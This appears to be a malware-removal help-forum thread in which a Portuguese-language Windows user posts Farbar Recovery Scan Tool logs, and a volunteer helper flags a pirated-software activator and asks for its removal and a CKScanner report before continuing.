2016-07-11 18:15 - 2016-06-29 23:44 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-07-13 19:24 - 2016-07-13 19:24 - 00146232 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-07-13 19:24 - 2016-07-13 19:24 - 00479288 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-07-15 14:28 - 2016-07-15 14:28 - 03000832 _____ () C:\Program Files\AVAST Software\Avast\defs\16071500\algo.dll
2016-07-15 22:16 - 2016-07-15 22:16 - 03000832 _____ () C:\Program Files\AVAST Software\Avast\defs\16071501\algo.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-07-13 19:24 - 2016-07-13 19:24 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2016-05-17 23:42 - 2016-05-17 23:42 - 00021680 _____ () C:\Program Files (x86)\Notepad++\plugins\NppExport.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 14:25 - 2013-08-22 14:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2876588207-1483049806-666444280-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\User not found\Desktop\ktm_990_super_duke-1920x1080.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\StartupApproved\Run: => "Steam"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{E37E6571-9825-4325-B6B7-2AB99CCDB955}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4F08C9F2-CC01-4139-BE9D-CF2CDFEA42ED}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{380FA6AC-4D9D-4F44-AB04-32F9A638C5D1}] => (Allow) C:\Users\User not found\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B0D32A46-3F0A-4D50-A72F-B0911829AC12}] => (Allow) C:\Users\User not found\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{3C8A93D3-1683-4DD5-B741-8D55BB81C4C1}] => (Allow) C:\Users\User not found\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{5A27A3D9-20FB-4B0B-A859-7F527545AB45}] => (Allow) C:\Users\User not found\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{FBFEF503-C7B1-44F1-BCBD-D550699B8B3F}] => (Allow) C:\Users\User not found\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{F8EE1B46-3A6D-4E0B-ADA7-02D47E60717B}] => (Allow) C:\Users\User not found\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{0298D77C-C35B-4C87-BE10-7585B2899A71}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{02CD9553-153A-46AA-8491-D978D7B79E40}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{E296092F-C5A4-4BCF-817F-B0C01B339D5F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{509DEB44-7D36-46E4-AEBB-A3AE2806A30F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{C38EDE32-01C9-4161-9CFF-B782E96FF5E9}] => (Allow) C:\Users\User not found\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [{0A2240BB-D446-45FE-89BC-3115B09887DC}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{F044EFC4-F243-46EB-BF30-ACCF9134E575}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{EA4F1002-5D19-435B-BD25-46F3B8A3CE37}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{650D0A2F-D805-462D-8ACB-1390A909D387}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{08CB1348-9502-43D4-94A3-63271526B047}] => (Allow) LPort=1688
FirewallRules: [{8D5A8400-6A2E-48DE-9B2D-D971ABF18C36}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{7F928E53-1420-4A10-8920-CD1BA0769E78}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{EA49333A-ADA2-4AEA-8A2F-1D18D9AC2E38}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{4743703C-2692-495C-B384-479E84A8F05A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{1568C556-747A-4BC2-995A-6F0F346E38DE}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{3BE8FFE5-2A2C-443E-B3B2-C69A8BC2C976}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{96DC6AAE-8DDF-4430-8E50-C5F29E80258C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{4FB6491A-4506-4E08-B15C-5DF53E582A0B}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{0CDAC64E-3D63-4D01-84CA-F68229F571A2}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{2186CDBA-F2FF-403E-B0DA-6C10165B6F71}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{F370ADF2-FA62-4B98-90E7-B3AB1F4BD746}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{98431B85-8EBF-49EE-9C51-B8EF7231D9C3}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe
FirewallRules: [{61EAC859-1A43-4545-9207-37144D3CBE92}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe
FirewallRules: [{C15A40D7-8CE9-4CD9-966D-435EDD2725F2}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [{07840DC7-B411-4F16-9F02-1030FF0BB822}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [{2112DEC3-F69B-4E9E-9310-C29E97A50ED2}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [{C86D1D88-C6F7-493E-A25F-0AC1EFA7CAF9}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [{29AA85B4-1EE0-40A3-B8CF-791C6B4280B3}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [{A574B610-504F-4A3F-82F6-F7DBA15F5158}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [{BB74727D-FE63-4364-8889-472C20F164F2}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [{C9783186-8C34-4E33-9B1D-CCB63C134E54}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{CBEA8C58-5503-421B-BD4D-761814CF609E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{A9E5CBF0-E0EA-4EB7-A3B8-E21D0EFB4FE2}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{542D013C-5031-4FA4-BA2E-66AF36AA8A4A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{85A6F4B3-3854-44EF-AF6D-5A9AD2627FDD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{A6B398C6-2FD4-4F27-997A-04FF98D16674}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{C8BFF980-5F3B-43CE-A980-1F97D4E629BE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe

==================== Restore Points =========================

04-07-2016 13:40:41 Remoção do Language Pack
12-07-2016 18:55:37 Ponto de Verificação Agendado
13-07-2016 19:26:37 ASU_MSI_TRAN

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (07/13/2016 11:59:03 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/13/2016 10:51:12 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/13/2016 10:41:18 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/11/2016 06:19:51 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/11/2016 06:10:05 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/08/2016 02:57:43 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/08/2016 02:47:50 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/02/2016 11:59:15 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/02/2016 07:31:46 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]

Error: (07/02/2016 03:54:10 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação da Prova de Compra. 0xC004F069
Pkey Parcial=7CBQ6
ACID=?
Erro Detalhado[?]


System errors:
=============
Error: (07/13/2016 10:41:07 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {3EEF301F-B596-4C0B-BD92-013BEAFCE793}

Error: (07/13/2016 07:02:18 PM) (Source: Ntfs) (EventID: 137) (User: )
Description: O gestor de recursos de transações predefinido no volume F: encontrou um erro permanente e não conseguiu iniciar. Os dados contêm o código de erro.

Error: (07/13/2016 06:10:39 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (07/13/2016 06:10:09 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (07/12/2016 06:59:41 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (07/12/2016 06:59:11 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (07/12/2016 03:43:33 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (07/12/2016 03:43:03 PM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (07/08/2016 02:49:50 PM) (Source: Microsoft-Windows-LanguagePackSetup) (EventID: 1000) (User: NT AUTHORITY)
Description: Falha na inicialização do Cliente de CBS. Último erro: 0x80080005

Error: (07/08/2016 02:49:50 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}


==================== Memory info ===========================

Processor: Intel® Core™ i5-3317U CPU @ 1.70GHz
Percentage of memory in use: 42%
Total physical RAM: 5845.53 MB
Available physical RAM: 3334.87 MB
Total Virtual: 6805.54 MB
Available Virtual: 4152.06 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:505.08 GB) (Free:408.36 GB) NTFS
Drive d: (Disco Pessoal) (Fixed) (Total:150 GB) (Free:7.24 GB) NTFS
Drive e: (Disco Local) (Fixed) (Total:250 GB) (Free:8.99 GB) NTFS
Drive f: () (Removable) (Total:1.86 GB) (Free:1.86 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: D4A83735)

Partition: GPT.

========================================================
Disk: 1 (Size: 22.4 GB) (Disk ID: 9F8C219F)

Partition: GPT.

========================================================
Disk: 2 (Size: 1.9 GB) (Disk ID: C3D04DA2)
Partition 1: (Not Active) - (Size=1.9 GB) - (Type=0B)

==================== End of Addition.txt ============================

 

Thank you Gary for your help!

Attached Files



#4 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,773 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:12:18 AM

Posted 15 July 2016 - 08:44 PM

Greetings Telmo and thank you for the information.

Unfortunately there is evidence of illegal software on your computer. I am going to request you completely uninstall Microsoft Office Professional Plus 2016 and all other products for which you do not have a valid Product Key. If you are willing to do that please rerun a FRST scan with Addition.txt checked and post both logs. If you prefer to leave the program(s) on your computer let me know that and I will be closing the Topic.

If you decide to remove the program(s) please do this.

===================================================

CKScanner

--------------------
  • Download CKScanner and save it to your Desktop
  • Double click CKScanner
  • Select Search For Files
  • Once completed select Save List to File
  • A ckfiles.txt document will be placed on your Desktop
  • Copy and paste the results of that report in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • CKScanner report

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#5 TheGoodGuy

TheGoodGuy
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:18 AM

Posted 16 July 2016 - 08:37 AM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 16-07-2016
Ran by User not found (administrator) on ERROR (16-07-2016 14:20:11)
Running from C:\Users\User not found\Downloads
Loaded Profiles: User not found (Available Profiles: User not found)
Platform: Windows 8.1 Pro (Update) (X64) Language: Português (Portugal)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AVAST Software) C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Skype Technologies) C:\Program Files (x86)\Skype\Updater\Updater.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.17709_none_fa7932f59afc2e40\TiWorker.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Update Core\WLMerger.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-06-29] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [8900328 2016-07-13] (AVAST Software)
HKLM\...\Policies\Explorer: [NoAutorun] 1
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2917456 2016-06-15] (Valve Corporation)
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [26424960 2016-06-29] (Skype Technologies S.A.)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [178136 2016-06-29] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [155768 2016-06-29] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-07-13] (AVAST Software)
Startup: C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk [2016-06-29]
ShortcutTarget: helper.lnk -> C:\Users\User not found\AppData\Roaming\WindowsServices\helper.vbs ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{75C866C4-A430-4FAE-AF9D-71B6AAF83C57}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{75C866C4-A430-4FAE-AF9D-71B6AAF83C57}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-07-13] (AVAST Software)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-07-13] (AVAST Software)

FireFox:
========
FF ProfilePath: C:\Users\User not found\AppData\Roaming\Mozilla\Firefox\Profiles\3ajkld8y.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_22_0_0_209.dll [2016-07-12] ()
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_22_0_0_209.dll [2016-07-12] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll [2013-05-13] ( Microsoft Corporation)
FF Extension: Unseen - C:\Users\User not found\AppData\Roaming\Mozilla\Firefox\Profiles\3ajkld8y.default\Extensions\unseen@tangrs.xpi [2016-06-15]
FF Extension: Adblock Plus - C:\Users\User not found\AppData\Roaming\Mozilla\Firefox\Profiles\3ajkld8y.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-06-15]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-07-13]
FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-07-13]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [197128 2016-07-13] (AVAST Software)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163712 2016-06-29] (NVIDIA Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [330136 2015-08-27] (Intel Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-06-29] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3632576 2016-06-29] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2521024 2016-06-29] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2122248 2016-06-23] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [75136 2016-06-23] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-07-13] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-07-13] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [108304 2016-07-13] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-07-13] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-07-13] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1070904 2016-07-13] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [473592 2016-07-13] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [162904 2016-07-13] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [290088 2016-07-13] (AVAST Software)
R3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1390904 2013-10-15] (Motorola Solutions, Inc.)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3345376 2013-09-04] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-06-29] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [56384 2016-06-29] (NVIDIA Corporation)
R3 RadioHIDMini; C:\Windows\System32\drivers\RadioHIDMini.sys [32168 2015-07-16] (Windows ® Win 7 DDK provider)
R3 SensorsSimulatorDriver; C:\Windows\system32\DRIVERS\WUDFRd.sys [226304 2014-11-21] (Microsoft Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
R3 WirelessKeyboardFilter; C:\Windows\System32\drivers\WirelessKeyboardFilter.sys [49384 2016-03-29] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-16 13:51 - 2016-07-16 13:51 - 00000000 ____D C:\Users\User not found\Downloads\FRST-OlderVersion
2016-07-16 12:49 - 2016-07-16 12:49 - 00000000 ____D C:\Windows\system32\appmgmt
2016-07-15 22:34 - 2016-07-15 22:34 - 00077163 _____ C:\Users\User not found\Documents\Summary.zip
2016-07-15 22:30 - 2016-07-15 22:30 - 01987490 _____ C:\Users\User not found\Documents\Summary.nfo
2016-07-15 22:20 - 2016-07-16 14:16 - 00028041 _____ C:\Users\User not found\Downloads\Addition.txt
2016-07-15 22:18 - 2016-07-16 14:20 - 00010508 _____ C:\Users\User not found\Downloads\FRST.txt
2016-07-15 22:18 - 2016-07-16 14:20 - 00000000 ____D C:\FRST
2016-07-15 22:18 - 2016-07-16 13:51 - 02391040 _____ (Farbar) C:\Users\User not found\Downloads\FRST64.exe
2016-07-15 14:55 - 2016-07-15 15:00 - 00000314 _____ C:\Users\User not found\Desktop\new 1.vbs
2016-07-15 14:54 - 2016-07-15 14:55 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Notepad++
2016-07-15 14:54 - 2016-07-15 14:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++
2016-07-15 14:54 - 2016-07-15 14:54 - 00000000 ____D C:\Program Files (x86)\Notepad++
2016-07-14 01:00 - 2016-05-23 10:38 - 00002187 _____ C:\Users\User not found\Desktop\helper
2016-07-14 00:59 - 2016-03-26 21:28 - 00001703 _____ C:\Users\User not found\Desktop\movemenoreg
2016-07-13 20:11 - 2016-07-13 20:11 - 00000446 __RSH C:\ProgramData\ntuser.pol
2016-07-13 19:27 - 2016-07-13 19:27 - 00003892 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1468434428
2016-07-13 19:27 - 2016-07-13 19:27 - 00001053 _____ C:\Users\Public\Desktop\Avast SafeZone Browser.lnk
2016-07-13 19:27 - 2016-07-13 19:27 - 00001053 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2016-07-13 19:26 - 2016-07-13 19:26 - 00037144 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2016-07-13 19:25 - 2016-07-13 19:25 - 00001938 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2016-07-13 19:25 - 2016-07-13 19:25 - 00000000 ____D C:\Users\User not found\AppData\Roaming\AVAST Software
